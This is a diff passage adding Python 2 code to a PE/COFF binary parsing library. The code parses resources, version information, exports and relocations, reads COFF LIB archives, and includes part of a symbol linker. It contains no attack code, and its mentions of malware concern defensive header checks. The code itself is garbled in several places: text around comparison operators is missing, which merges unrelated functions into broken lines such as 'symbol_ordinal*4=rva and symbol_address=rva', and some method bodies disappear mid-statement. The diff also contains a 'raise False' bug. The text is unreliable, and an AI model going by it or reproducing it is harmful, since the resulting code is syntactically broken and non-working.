+ 'the RVA is invalid: 0x%x' % ( rva ) )
+ return None
+
+ data_entry = self.__unpack_data__(
+ self.__IMAGE_RESOURCE_DATA_ENTRY_format__, data,
+ file_offset = self.get_offset_from_rva(rva) )
+
+ return data_entry
+
+
+ def parse_resource_entry(self, rva):
+ """Parse a directory entry from the resources directory."""
+
+ resource = self.__unpack_data__(
+ self.__IMAGE_RESOURCE_DIRECTORY_ENTRY_format__, self.get_data(rva),
+ file_offset = self.get_offset_from_rva(rva) )
+
+ if resource is None:
+ return None
+
+ #resource.NameIsString = (resource.Name & 0x80000000L) >> 31
+ resource.NameOffset = resource.Name & 0x7FFFFFFFL
+
+ resource.__pad = resource.Name & 0xFFFF0000L
+ resource.Id = resource.Name & 0x0000FFFFL
+
+ resource.DataIsDirectory = (resource.OffsetToData & 0x80000000L) >> 31
+ resource.OffsetToDirectory = resource.OffsetToData & 0x7FFFFFFFL
+
+ return resource
+
+
+ def parse_version_information(self, version_struct):
+ """Parse version information structure.
+
+ The date will be made available in three attributes of the PE object.
+
+ VS_VERSIONINFO will contain the first three fields of the main structure:
+ 'Length', 'ValueLength', and 'Type'
+
+ VS_FIXEDFILEINFO will hold the rest of the fields, accessible as sub-attributes:
+ 'Signature', 'StrucVersion', 'FileVersionMS', 'FileVersionLS',
+ 'ProductVersionMS', 'ProductVersionLS', 'FileFlagsMask', 'FileFlags',
+ 'FileOS', 'FileType', 'FileSubtype', 'FileDateMS', 'FileDateLS'
+
+ FileInfo is a list of all StringFileInfo and VarFileInfo structures.
+
+ StringFileInfo structures will have a list as an attribute named 'StringTable'
+ containing all the StringTable structures. Each of those structures contains a
+ dictionary 'entries' with all the key/value version information string pairs.
+
+ VarFileInfo structures will have a list as an attribute named 'Var' containing
+ all Var structures. Each Var structure will have a dictionary as an attribute
+ named 'entry' which will contain the name and value of the Var.
+ """
+
+
+ # Retrieve the data for the version info resource
+ #
+ start_offset = self.get_offset_from_rva( version_struct.OffsetToData )
+ raw_data = self.__data__[ start_offset : start_offset+version_struct.Size ]
+
+
+ # Map the main structure and the subsequent string
+ #
+ versioninfo_struct = self.__unpack_data__(
+ self.__VS_VERSIONINFO_format__, raw_data,
+ file_offset = start_offset )
+
+ if versioninfo_struct is None:
+ return
+
+ ustr_offset = version_struct.OffsetToData + versioninfo_struct.sizeof()
+ try:
+ versioninfo_string = self.get_string_u_at_rva( ustr_offset )
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing the version information, ' +
+ 'attempting to read VS_VERSION_INFO string. Can\'t ' +
+ 'read unicode string at offset 0x%x' % (
+ ustr_offset ) )
+
+ versioninfo_string = None
+
+ # If the structure does not contain the expected name, it's assumed to be invalid
+ #
+ if versioninfo_string != u'VS_VERSION_INFO':
+
+ self.__warnings.append('Invalid VS_VERSION_INFO block')
+ return
+
+
+ # Set the PE object's VS_VERSIONINFO to this one
+ #
+ self.VS_VERSIONINFO = versioninfo_struct
+
+ # The the Key attribute to point to the unicode string identifying the structure
+ #
+ self.VS_VERSIONINFO.Key = versioninfo_string
+
+
+ # Process the fixed version information, get the offset and structure
+ #
+ fixedfileinfo_offset = self.dword_align(
+ versioninfo_struct.sizeof() + 2 * (len(versioninfo_string) + 1),
+ version_struct.OffsetToData)
+ fixedfileinfo_struct = self.__unpack_data__(
+ self.__VS_FIXEDFILEINFO_format__,
+ raw_data[fixedfileinfo_offset:],
+ file_offset = start_offset+fixedfileinfo_offset )
+
+ if not fixedfileinfo_struct:
+ return
+
+
+ # Set the PE object's VS_FIXEDFILEINFO to this one
+ #
+ self.VS_FIXEDFILEINFO = fixedfileinfo_struct
+
+
+ # Start parsing all the StringFileInfo and VarFileInfo structures
+ #
+
+ # Get the first one
+ #
+ stringfileinfo_offset = self.dword_align(
+ fixedfileinfo_offset + fixedfileinfo_struct.sizeof(),
+ version_struct.OffsetToData)
+ original_stringfileinfo_offset = stringfileinfo_offset
+
+
+ # Set the PE object's attribute that will contain them all.
+ #
+ self.FileInfo = list()
+
+
+ while True:
+
+ # Process the StringFileInfo/VarFileInfo struct
+ #
+ stringfileinfo_struct = self.__unpack_data__(
+ self.__StringFileInfo_format__,
+ raw_data[stringfileinfo_offset:],
+ file_offset = start_offset+stringfileinfo_offset )
+
+ if stringfileinfo_struct is None:
+ self.__warnings.append(
+ 'Error parsing StringFileInfo/VarFileInfo struct' )
+ return None
+
+ # Get the subsequent string defining the structure.
+ #
+ ustr_offset = ( version_struct.OffsetToData +
+ stringfileinfo_offset + versioninfo_struct.sizeof() )
+ try:
+ stringfileinfo_string = self.get_string_u_at_rva( ustr_offset )
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing the version information, ' +
+ 'attempting to read StringFileInfo string. Can\'t ' +
+ 'read unicode string at offset 0x%x' % ( ustr_offset ) )
+ break
+
+ # Set such string as the Key attribute
+ #
+ stringfileinfo_struct.Key = stringfileinfo_string
+
+
+ # Append the structure to the PE object's list
+ #
+ self.FileInfo.append(stringfileinfo_struct)
+
+
+ # Parse a StringFileInfo entry
+ #
+ if stringfileinfo_string == u'StringFileInfo':
+
+ if stringfileinfo_struct.Type == 1 and stringfileinfo_struct.ValueLength == 0:
+
+ stringtable_offset = self.dword_align(
+ stringfileinfo_offset + stringfileinfo_struct.sizeof() +
+ 2*(len(stringfileinfo_string)+1),
+ version_struct.OffsetToData)
+
+ stringfileinfo_struct.StringTable = list()
+
+ # Process the String Table entries
+ #
+ while True:
+ stringtable_struct = self.__unpack_data__(
+ self.__StringTable_format__,
+ raw_data[stringtable_offset:],
+ file_offset = start_offset+stringtable_offset )
+
+ if not stringtable_struct:
+ break
+
+ ustr_offset = ( version_struct.OffsetToData + stringtable_offset +
+ stringtable_struct.sizeof() )
+ try:
+ stringtable_string = self.get_string_u_at_rva( ustr_offset )
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing the version information, ' +
+ 'attempting to read StringTable string. Can\'t ' +
+ 'read unicode string at offset 0x%x' % ( ustr_offset ) )
+ break
+
+ stringtable_struct.LangID = stringtable_string
+ stringtable_struct.entries = dict()
+ stringfileinfo_struct.StringTable.append(stringtable_struct)
+
+ entry_offset = self.dword_align(
+ stringtable_offset + stringtable_struct.sizeof() +
+ 2*(len(stringtable_string)+1),
+ version_struct.OffsetToData)
+
+ # Process all entries in the string table
+ #
+
+ while entry_offset < stringtable_offset + stringtable_struct.Length:
+
+ string_struct = self.__unpack_data__(
+ self.__String_format__, raw_data[entry_offset:],
+ file_offset = start_offset+entry_offset )
+
+ if not string_struct:
+ break
+
+ ustr_offset = ( version_struct.OffsetToData + entry_offset +
+ string_struct.sizeof() )
+ try:
+ key = self.get_string_u_at_rva( ustr_offset )
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing the version information, ' +
+ 'attempting to read StringTable Key string. Can\'t ' +
+ 'read unicode string at offset 0x%x' % ( ustr_offset ) )
+ break
+
+ value_offset = self.dword_align(
+ 2*(len(key)+1) + entry_offset + string_struct.sizeof(),
+ version_struct.OffsetToData)
+
+ ustr_offset = version_struct.OffsetToData + value_offset
+ try:
+ value = self.get_string_u_at_rva( ustr_offset,
+ max_length = string_struct.ValueLength )
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing the version information, ' +
+ 'attempting to read StringTable Value string. ' +
+ 'Can\'t read unicode string at offset 0x%x' % (
+ ustr_offset ) )
+ break
+
+ if string_struct.Length == 0:
+ entry_offset = stringtable_offset + stringtable_struct.Length
+ else:
+ entry_offset = self.dword_align(
+ string_struct.Length+entry_offset, version_struct.OffsetToData)
+
+ key_as_char = []
+ for c in key:
+ if ord(c)>128:
+ key_as_char.append('\\x%02x' %ord(c))
+ else:
+ key_as_char.append(c)
+
+ key_as_char = ''.join(key_as_char)
+
+ setattr(stringtable_struct, key_as_char, value)
+ stringtable_struct.entries[key] = value
+
+
+ stringtable_offset = self.dword_align(
+ stringtable_struct.Length + stringtable_offset,
+ version_struct.OffsetToData)
+ if stringtable_offset >= stringfileinfo_struct.Length:
+ break
+
+ # Parse a VarFileInfo entry
+ #
+ elif stringfileinfo_string == u'VarFileInfo':
+
+ varfileinfo_struct = stringfileinfo_struct
+ varfileinfo_struct.name = 'VarFileInfo'
+
+ if varfileinfo_struct.Type == 1 and varfileinfo_struct.ValueLength == 0:
+
+ var_offset = self.dword_align(
+ stringfileinfo_offset + varfileinfo_struct.sizeof() +
+ 2*(len(stringfileinfo_string)+1),
+ version_struct.OffsetToData)
+
+ varfileinfo_struct.Var = list()
+
+ # Process all entries
+ #
+
+ while True:
+ var_struct = self.__unpack_data__(
+ self.__Var_format__,
+ raw_data[var_offset:],
+ file_offset = start_offset+var_offset )
+
+ if not var_struct:
+ break
+
+ ustr_offset = ( version_struct.OffsetToData + var_offset +
+ var_struct.sizeof() )
+ try:
+ var_string = self.get_string_u_at_rva( ustr_offset )
+ except PEFormatError, excp:
+ self.__warnings.append(
+ 'Error parsing the version information, ' +
+ 'attempting to read VarFileInfo Var string. ' +
+ 'Can\'t read unicode string at offset 0x%x' % (ustr_offset))
+ break
+
+
+ varfileinfo_struct.Var.append(var_struct)
+
+ varword_offset = self.dword_align(
+ 2*(len(var_string)+1) + var_offset + var_struct.sizeof(),
+ version_struct.OffsetToData)
+ orig_varword_offset = varword_offset
+
+ while varword_offset < orig_varword_offset + var_struct.ValueLength:
+ word1 = self.get_word_from_data(
+ raw_data[varword_offset:varword_offset+2], 0)
+ word2 = self.get_word_from_data(
+ raw_data[varword_offset+2:varword_offset+4], 0)
+ varword_offset += 4
+
+ var_struct.entry = {var_string: '0x%04x 0x%04x' % (word1, word2)}
+
+ var_offset = self.dword_align(
+ var_offset+var_struct.Length, version_struct.OffsetToData)
+
+ if var_offset <= var_offset+var_struct.Length:
+ break
+
+
+
+ # Increment and align the offset
+ #
+ stringfileinfo_offset = self.dword_align(
+ stringfileinfo_struct.Length+stringfileinfo_offset,
+ version_struct.OffsetToData)
+
+ # Check if all the StringFileInfo and VarFileInfo items have been processed
+ #
+ if stringfileinfo_struct.Length == 0 or stringfileinfo_offset >= versioninfo_struct.Length:
+ break
+
+
+
+ def parse_export_directory(self, rva, size):
+ """Parse the export directory.
+
+ Given the rva of the export directory, it will process all
+ its entries.
+
+ The exports will be made available through a list "exports"
+ containing a tuple with the following elements:
+
+ (ordinal, symbol_address, symbol_name)
+
+ And also through a dicionary "exports_by_ordinal" whose keys
+ will be the ordinals and the values tuples of the from:
+
+ (symbol_address, symbol_name)
+
+ The symbol addresses are relative, not absolute.
+ """
+
+ try:
+ export_dir = self.__unpack_data__(
+ self.__IMAGE_EXPORT_DIRECTORY_format__, self.get_data(rva),
+ file_offset = self.get_offset_from_rva(rva) )
+ except PEFormatError:
+ self.__warnings.append(
+ 'Error parsing export directory at RVA: 0x%x' % ( rva ) )
+ return
+
+ if not export_dir:
+ return
+
+ try:
+ address_of_names = self.get_data(
+ export_dir.AddressOfNames, export_dir.NumberOfNames*4)
+ address_of_name_ordinals = self.get_data(
+ export_dir.AddressOfNameOrdinals, export_dir.NumberOfNames*4)
+ address_of_functions = self.get_data(
+ export_dir.AddressOfFunctions, export_dir.NumberOfFunctions*4)
+ except PEFormatError:
+ self.__warnings.append(
+ 'Error parsing export directory at RVA: 0x%x' % ( rva ) )
+ return
+
+ exports = []
+
+ for i in xrange(export_dir.NumberOfNames):
+
+
+ symbol_name = self.get_string_at_rva(
+ self.get_dword_from_data(address_of_names, i))
+
+ symbol_ordinal = self.get_word_from_data(
+ address_of_name_ordinals, i)
+
+
+ if symbol_ordinal*4=rva and symbol_address=rva and symbol_address len(self.__data__):
+ continue
+
+ if section.PointerToRawData > len(self.__data__):
+ continue
+
+ if section.VirtualAddress >= max_virtual_address:
+ continue
+
+ padding_length = section.VirtualAddress - len(data)
+
+ if padding_length>0:
+ data += '\0'*padding_length
+ elif padding_length<0:
+ data = data[:padding_length]
+
+ data += section.data
+
+ return data
+
+
+ def get_data(self, rva, length=None):
+ """Get data regardless of the section where it lies on.
+
+ Given a rva and the size of the chunk to retrieve, this method
+ will find the section where the data lies and return the data.
+ """
+
+ s = self.get_section_by_rva(rva)
+
+ if not s:
+ if rva len(data):
+ return None
+
+ return struct.unpack(' len(self.__data__):
+ return None
+
+ return self.get_dword_from_data(self.__data__[offset:offset+4], 0)
+
+
+ def set_dword_at_rva(self, rva, dword):
+ """Set the double word value at the file offset corresponding to the given RVA."""
+ return self.set_bytes_at_rva(rva, self.get_data_from_dword(dword))
+
+
+ def set_dword_at_offset(self, offset, dword):
+ """Set the double word value at the given file offset."""
+ return self.set_bytes_at_offset(offset, self.get_data_from_dword(dword))
+
+
+
+ ##
+ # Word get/set
+ ##
+
+ def get_data_from_word(self, word):
+ """Return a two byte string representing the word value. (little endian)."""
+ return struct.pack(' len(data):
+ return None
+
+ return struct.unpack(' len(self.__data__):
+ return None
+
+ return self.get_word_from_data(self.__data__[offset:offset+2], 0)
+
+
+ def set_word_at_rva(self, rva, word):
+ """Set the word value at the file offset corresponding to the given RVA."""
+ return self.set_bytes_at_rva(rva, self.get_data_from_word(word))
+
+
+ def set_word_at_offset(self, offset, word):
+ """Set the word value at the given file offset."""
+ return self.set_bytes_at_offset(offset, self.get_data_from_word(word))
+
+
+ ##
+ # Quad-Word get/set
+ ##
+
+ def get_data_from_qword(self, word):
+ """Return a eight byte string representing the quad-word value. (little endian)."""
+ return struct.pack(' len(data):
+ return None
+
+ return struct.unpack(' len(self.__data__):
+ return None
+
+ return self.get_qword_from_data(self.__data__[offset:offset+8], 0)
+
+
+ def set_qword_at_rva(self, rva, qword):
+ """Set the quad-word value at the file offset corresponding to the given RVA."""
+ return self.set_bytes_at_rva(rva, self.get_data_from_qword(qword))
+
+
+ def set_qword_at_offset(self, offset, qword):
+ """Set the quad-word value at the given file offset."""
+ return self.set_bytes_at_offset(offset, self.get_data_from_qword(qword))
+
+
+
+ ##
+ # Set bytes
+ ##
+
+
+ def set_bytes_at_rva(self, rva, data):
+ """Overwrite, with the given string, the bytes at the file offset corresponding to the given RVA.
+
+ Return True if successful, False otherwise. It can fail if the
+ offset is outside the file's boundaries.
+ """
+
+ offset = self.get_physical_by_rva(rva)
+ if not offset:
+ raise False
+
+ return self.set_bytes_at_offset(offset, data)
+
+
+ def set_bytes_at_offset(self, offset, data):
+ """Overwrite the bytes at the given file offset with the given string.
+
+ Return True if successful, False otherwise. It can fail if the
+ offset is outside the file's boundaries.
+ """
+
+ if not isinstance(data, str):
+ raise TypeError('data should be of type: str')
+
+ if offset >= 0 and offset < len(self.__data__):
+ self.__data__ = ( self.__data__[:offset] +
+ data +
+ self.__data__[offset+len(data):] )
+ else:
+ return False
+
+ # Refresh the section's data with the modified information
+ #
+ for section in self.sections:
+ section_data_start = section.PointerToRawData
+ section_data_end = section_data_start+section.SizeOfRawData
+ section.data = self.__data__[section_data_start:section_data_end]
+
+ return True
+
+
+
+ def relocate_image(self, new_ImageBase):
+ """Apply the relocation information to the image using the provided new image base.
+
+ This method will apply the relocation information to the image. Given the new base,
+ all the relocations will be processed and both the raw data and the section's data
+ will be fixed accordingly.
+ The resulting image can be retrieved as well through the method:
+
+ get_memory_mapped_image()
+
+ In order to get something that would more closely match what could be found in memory
+ once the Windows loader finished its work.
+ """
+
+ relocation_difference = new_ImageBase - self.OPTIONAL_HEADER.ImageBase
+
+
+ for reloc in self.DIRECTORY_ENTRY_BASERELOC:
+
+ virtual_address = reloc.struct.VirtualAddress
+ size_of_block = reloc.struct.SizeOfBlock
+
+ # We iterate with an index because if the relocation is of type
+ # IMAGE_REL_BASED_HIGHADJ we need to also process the next entry
+ # at once and skip it for the next interation
+ #
+ entry_idx = 0
+ while entry_idx>16)&0xffff )
+
+ elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_LOW']:
+ # Fix the low 16bits of a relocation
+ #
+ # Add low 16 bits of relocation_difference to the 16bit value
+ # at RVA=entry.rva
+
+ self.set_word_at_rva(
+ entry.rva,
+ ( self.get_word_at_rva(entry.rva) + relocation_difference)&0xffff)
+
+ elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGHLOW']:
+ # Handle all high and low parts of a 32bit relocation
+ #
+ # Add relocation_difference to the value at RVA=entry.rva
+
+ self.set_dword_at_rva(
+ entry.rva,
+ self.get_dword_at_rva(entry.rva)+relocation_difference)
+
+ elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGHADJ']:
+ # Fix the high 16bits of a relocation and adjust
+ #
+ # Add high 16bits of relocation_difference to the 32bit value
+ # composed from the (16bit value at RVA=entry.rva)<<16 plus
+ # the 16bit value at the next relocation entry.
+ #
+
+ # If the next entry is beyond the array's limits,
+ # abort... the table is corrupt
+ #
+ if entry_idx == len(reloc.entries):
+ break
+
+ next_entry = reloc.entries[entry_idx]
+ entry_idx += 1
+ self.set_word_at_rva( entry.rva,
+ ((self.get_word_at_rva(entry.rva)<<16) + next_entry.rva +
+ relocation_difference & 0xffff0000) >> 16 )
+
+ elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_DIR64']:
+ # Apply the difference to the 64bit value at the offset
+ # RVA=entry.rva
+
+ self.set_qword_at_rva(
+ entry.rva,
+ self.get_qword_at_rva(entry.rva) + relocation_difference)
+
+class PE(COFF):
+ __IMAGE_DOS_HEADER_format__ = ('IMAGE_DOS_HEADER',
+ ('H,e_magic', 'H,e_cblp', 'H,e_cp',
+ 'H,e_crlc', 'H,e_cparhdr', 'H,e_minalloc',
+ 'H,e_maxalloc', 'H,e_ss', 'H,e_sp', 'H,e_csum',
+ 'H,e_ip', 'H,e_cs', 'H,e_lfarlc', 'H,e_ovno', '8s,e_res',
+ 'H,e_oemid', 'H,e_oeminfo', '20s,e_res2',
+ 'L,e_lfanew'))
+
+ __IMAGE_NT_HEADERS_format__ = ('IMAGE_NT_HEADERS', ('L,Signature',))
+
+ def __init__(self, name=None, data=None, fast_load=None):
+
+ if name:
+ fd = file(name, 'rb')
+ data = fd.read()
+ fd.close()
+
+ if not fast_load:
+ self.__fast_load__ = globals()["fast_load"]
+
+ COFF.__init__(self,data)
+
+ def __parse__(self):
+ self.DOS_HEADER = self.__unpack_data__(
+ self.__IMAGE_DOS_HEADER_format__,
+ self.__data__, file_offset=0)
+
+ if not self.DOS_HEADER or self.DOS_HEADER.e_magic != IMAGE_DOS_SIGNATURE:
+ raise PEFormatError('DOS Header magic not found.')
+
+ # OC Patch:
+ # Check for sane value in e_lfanew
+ #
+ if self.DOS_HEADER.e_lfanew > len(self.__data__):
+ raise PEFormatError('Invalid e_lfanew value, probably not a PE file')
+
+ nt_headers_offset = self.DOS_HEADER.e_lfanew
+
+ self.NT_HEADERS = self.__unpack_data__(
+ self.__IMAGE_NT_HEADERS_format__,
+ self.__data__[nt_headers_offset:],
+ file_offset = nt_headers_offset)
+
+ # We better check the signature right here, before the file screws
+ # around with sections:
+ # OC Patch:
+ # Some malware will cause the Signature value to not exist at all
+ if not self.NT_HEADERS or not self.NT_HEADERS.Signature:
+ raise PEFormatError('NT Headers not found.')
+
+ if self.NT_HEADERS.Signature != IMAGE_NT_SIGNATURE:
+ raise PEFormatError('Invalid NT Headers signature.')
+
+ COFF.__parse__(self,file_header_offset=nt_headers_offset + 4,require_optional_header=True)
+
+ self.NT_HEADERS.FILE_HEADER = self.FILE_HEADER
+ self.NT_HEADERS.OPTIONAL_HEADER = self.OPTIONAL_HEADER
+
+ if not self.__fast_load__:
+ self.parse_data_directories()
+
+
+class OBJ(COFF):
+
+ def __init__(self, name=None, data=None, fast_load=None):
+ if name:
+ fd = file(name, 'rb')
+ data = fd.read()
+ fd.close()
+
+ COFF.__init__(self,data)
+
+ def __parse__(self):
+ COFF.__parse__(self)
+
+
+class LIB:
+
+ __ARCHIVE_MEMBER_HEADER_format__ = ('ARCHIVE_MEMBER_HEADER',
+ ('16s,Name', '12s,Date', '6s,UserID',
+ '6s,GroupID', '8s,Mode', '10s,Size',
+ '2s,EndOfHeader'))
+
+ __ARCHIVE_SIGNATURE_format__ = ('ARCHIVE_SIGNATURE', ('8s,Signature',))
+
+ def __init__(self, name=None, data=None, fast_load=None):
+ if not name and not data:
+ return
+
+ if name:
+ fd = file(name, 'rb')
+ data = fd.read()
+ fd.close()
+
+ self.__warnings = []
+
+ # This list will keep track of all the structures created.
+ # That will allow for an easy iteration through the list
+ # in order to save the modifications made
+ self.__structures__ = []
+
+ self.Objects = {}
+
+ self.__related_libs__ = {}
+
+ self.__data__ = data
+
+ self.__parse__()
+
+ def __unpack_data__(self, format, data, file_offset):
+ """Apply structure format to raw data.
+
+ Returns and unpacked structure object if successful, None otherwise.
+ """
+
+ structure = Structure(format, file_offset=file_offset)
+ if len(data) < structure.sizeof():
+ return None
+
+ structure.__unpack__(data)
+
+ return structure
+
+ def __parse__(self):
+ self.ARCHIVE_SIGNATURE = self.__unpack_data__(
+ self.__ARCHIVE_SIGNATURE_format__,
+ self.__data__, file_offset=0)
+
+ if not self.ARCHIVE_SIGNATURE or self.ARCHIVE_SIGNATURE.Signature != ARCHIVE_SIGNATURE:
+ raise PEFormatError('Archive file signature not found.')
+ self.__structures__.append(self.ARCHIVE_SIGNATURE)
+
+ first_linker_member_offset = self.ARCHIVE_SIGNATURE.sizeof()
+ self.FirstLinkerMember = self.parse_first_linker_member(first_linker_member_offset)
+ self.__structures__.append(self.FirstLinkerMember)
+
+ second_linker_member_offset = first_linker_member_offset + int(self.FirstLinkerMember.Header.Size) + self.FirstLinkerMember.Header.sizeof()
+ if second_linker_member_offset % 2: #must be even!
+ second_linker_member_offset += 1
+ self.SecondLinkerMember = self.parse_second_linker_member(second_linker_member_offset)
+ self.__structures__.append(self.SecondLinkerMember)
+
+ longnames_member_offset = second_linker_member_offset + int(self.SecondLinkerMember.Header.Size) + self.SecondLinkerMember.Header.sizeof()
+ if longnames_member_offset % 2: #must be even!
+ longnames_member_offset += 1
+
+ #The longnames member is optional (but always the third member of a COFF LIB)
+ if self.__data__[longnames_member_offset:longnames_member_offset+2] == '//':
+ longnames_member_header = self.__unpack_data__(
+ self.__ARCHIVE_MEMBER_HEADER_format__,
+ self.__data__[longnames_member_offset:], file_offset=longnames_member_offset)
+ longnames_data = self.__data__[
+ longnames_member_offset + longnames_member_header.sizeof() :
+ longnames_member_offset + longnames_member_header.sizeof() + int(longnames_member_header.Size)]
+ self.Longnames = LongnamesMemberData(
+ Header = longnames_member_header,
+ Data = longnames_data)
+ self.__structures__.append(self.Longnames)
+
+ offset = longnames_member_offset + longnames_member_header.sizeof() + int(longnames_member_header.Size)
+ if offset % 2: #must be even!
+ offset += 1
+ else:
+ offset = longnames_member_offset
+
+ for i in xrange(self.SecondLinkerMember.NumberOfMembers):
+ member_header = self.__unpack_data__(
+ self.__ARCHIVE_MEMBER_HEADER_format__,
+ self.__data__[offset:], file_offset=offset)
+
+ #print "'%s'" % member_header.Name, "'%s'" % member_header.Date, "'%s'" % member_header.UserID, "'%s'" % member_header.GroupID, "'%s'" % member_header.Mode,"'%s'" % member_header.Size, "'%s'" % member_header.EndOfHeader
+
+ member_name = member_header.Name
+ debug = False
+ if member_name[0] == "/":
+ member_name = parse_nullterm_string(self.Longnames.Data[int(member_name[1:]):])
+
+ offset += member_header.sizeof()
+ #print "Parsing %s at %08x... (%d/%d)" % (member_name,offset,i+1,self.SecondLinkerMember.NumberOfMembers)
+
+
+ if self.__data__[offset:offset+4] == '\x00\x00\xff\xff':
+ #short import
+ member_obj = ShortImportStructure()
+ member_obj.__unpack__(self.__data__[offset:])
+ else:
+ member_obj = COFF(self.__data__[offset:])
+
+ member_obj.LIBOffset = offset - member_header.sizeof()
+
+ object_member = ObjectMemberData(
+ Header = member_header,
+ Object = member_obj)
+
+ self.Objects[offset - member_header.sizeof()] = object_member
+ self.__structures__.append(object_member)
+
+ offset += int(member_header.Size)
+ if offset % 2: #must be even!
+ offset += 1
+
+ self.build_symbol_list()
+
+
+ def build_symbol_list(self):
+ self.symbols = {}
+
+ linker_member = self.SecondLinkerMember
+ for name,index in linker_member.Symbols:
+ # find the obj which contains our symbol:
+ member_offset = linker_member.MemberOffsets[index-1]
+ obj = self.Objects[member_offset].Object
+ # get the symbol record:
+ if hasattr(obj, "SymbolTableByName"):
+ symbol = obj.SymbolTableByName[name]
+ if not symbol:
+ raise Exception("Couldn't find symbol in COFF object")
+ else:
+ #is a short import object
+ symbol=obj
+
+ self.symbols[name]=symbol
+
+ def parse_first_linker_member(self, offset):
+ member_header = self.__unpack_data__(
+ self.__ARCHIVE_MEMBER_HEADER_format__,
+ self.__data__[offset:], file_offset=offset)
+
+ offset += member_header.sizeof()
+ number_of_symbols = int(struct.unpack(">I", self.__data__[offset:offset+4])[0])
+
+ strings_offset = offset + 4 + number_of_symbols*4
+ strings = parse_nullterm_strings(self.__data__[strings_offset:offset + int(member_header.Size)])
+ offset += 4
+ symbols = []
+ for i in xrange(number_of_symbols):
+ symbols.append((int(struct.unpack(">I", self.__data__[offset+4*i:offset+4*i+4])[0]),strings[i]))
+
+ return FirstLinkerMemberData(
+ Header=member_header,
+ NumberOfSymbols = number_of_symbols,
+ Symbols = symbols)
+
+ def parse_second_linker_member(self, offset):
+ original_offset = offset
+ member_header = self.__unpack_data__(
+ self.__ARCHIVE_MEMBER_HEADER_format__,
+ self.__data__[offset:], file_offset=offset)
+
+ #print "'%s'" % member_header.Name, "'%s'" % member_header.Date, "'%s'" % member_header.UserID, "'%s'" % member_header.GroupID, "'%s'" % member_header.Mode,"'%s'" % member_header.Size, "'%s'" % member_header.EndOfHeader
+ offset += member_header.sizeof()
+ number_of_members = int(struct.unpack(" 0:
+ #add complete section (just once)
+ print "symbol is a real function:%s"%symbol.Name
+ if not self.link_sections.has_key(sect_id):
+ process_relocations = True
+ data = symbol.__section__.get_data(0)
+ self.link_binary+=data
+ sect_idx=self.link_idx
+ self.link_idx+=len(data)
+ self.link_sections[sect_id]=sect_idx
+ else:
+ sect_idx=self.link_sections[sect_id]
+ self.link_symbols[offset][symbol.Name] = sect_idx + symbol.Value
+
+ elif symbol.StorageClass == IMAGE_SYMBOL_CLASSES['IMAGE_SYM_CLASS_STATIC']:
+ #add sections just once
+ print "symbol is a static section:%s"%symbol.Name
+ if not self.link_sections.has_key(sect_id):
+ if ".bss" in symbol.__section__.Name:
+ data = "\x00"*symbol.__section__.SizeOfRawData
+ else:
+ process_relocations = True
+ data = symbol.__section__.get_data(0)
+ self.link_binary+=data
+ sect_idx=self.link_idx
+ self.link_idx+=len(data)
+ self.link_sections[sect_id]=sect_idx
+ else:
+ sect_idx=self.link_sections[sect_id]
+ self.link_symbols[offset][symbol.Name] = sect_idx + symbol.Value
+
+ elif symbol.StorageClass == IMAGE_SYMBOL_CLASSES['IMAGE_SYM_CLASS_LABEL']:
+ print "symbol is a label:%s"%symbol.Name
+ if not self.link_sections.has_key(sect_id):
+ process_relocations = True
+ #may be we didn't get the real section yet, do it now.
+ data = symbol.__section__.get_data(0)
+ self.link_binary+=data
+ sect_idx=self.link_idx
+ self.link_idx+=len(data)
+ self.link_sections[sect_id]=sect_idx
+ else:
+ sect_idx=self.link_sections[sect_id]
+ self.link_symbols[offset][symbol.Name] = sect_idx + symbol.Value
+ elif symbol.StorageClass == IMAGE_SYMBOL_CLASSES['IMAGE_SYM_CLASS_WEAK_EXTERNAL'] and symbol.SectionNumber == IMAGE_SYM_UNDEFINED and \
+ symbol.Value == 0 and symbol.__auxsymbols__ and hasattr(symbol.__auxsymbols__[0],"Characteristics"):
+ #This is a weak external, resolve the related symbol
+ aux = symbol.__auxsymbols__[0]
+ if aux.Characteristics == 1: #IMAGE_WEAK_EXTERN_SEARCH_NOLIBRARY
+ print "symbol is an unresolved weak external:%s"%symbol.Name
+ self.link_symbols[offset][symbol.Name] = ( 0, "absolute" )
+ else:
+ try:
+ realsymbol = symbol.__parent__.SymbolTable[aux.TagIndex]
+ except:
+ print "we couldn't resolve the weak reference %s"%symbol.Name
+ raise KeyError
+
+ print "%s is a weak reference of %s"%(symbol.Name, realsymbol.Name)
+ linkedsymbol = self.link_dependencies(realsymbol.Name, realsymbol)
+ self.link_symbols[offset][symbol.Name] = self.link_symbols[linkedsymbol.__parent__.LIBOffset][linkedsymbol.Name]
+ #for off,sbls in self.link_symbols.iteritems():
+ #print "Offset:%x"%off
+ #for name,bin in sbls.iteritems():
+ #print "Symbol:%s, binary offset:%x"%(name,bin)
+ process_relocations = False
+
+ if process_relocations:
+ for reloc in symbol.__section__.relocations:
+ #print "%x -> %x (%s) (%s)"%(reloc[0],reloc[1],reloc[2],reloc[3])
+ coff = symbol.__parent__
+ rel_symbol = coff.SymbolTable[reloc.SymbolTableIndex]
+ rel_offset = rel_symbol.__parent__.LIBOffset
+ rel_sect_id="%x-%x"%(rel_offset, rel_symbol.SectionNumber-1)
+ rel_name = rel_symbol.Name
+ sect_addr = sect_idx + symbol.__section__.VirtualAddress
+ flags = None
+
+ #handle external symbols first
+ if rel_symbol.StorageClass == IMAGE_SYMBOL_CLASSES['IMAGE_SYM_CLASS_EXTERNAL'] and rel_symbol.SectionNumber == IMAGE_SYM_UNDEFINED and rel_symbol.Value == 0:
+ rel_symbol = self.link_dependencies(rel_name)
+ #check that the new symbol isn't an import
+ if not hasattr(rel_symbol,"ImportName"):
+ rel_offset = rel_symbol.__parent__.LIBOffset
+ rel_sect_id="%x-%x"%(rel_offset, rel_symbol.SectionNumber-1)
+
+ if hasattr(rel_symbol,"ImportName"):
+ #it's an import, not a real symbol
+ flags = "import"
+ rel_addr = self.link_imports[rel_name][2]
+ else:
+ if not self.link_symbols.has_key(rel_offset) or not self.link_symbols[rel_offset].has_key(rel_name):
+ self.link_dependencies(rel_name, rel_symbol)
+ try:
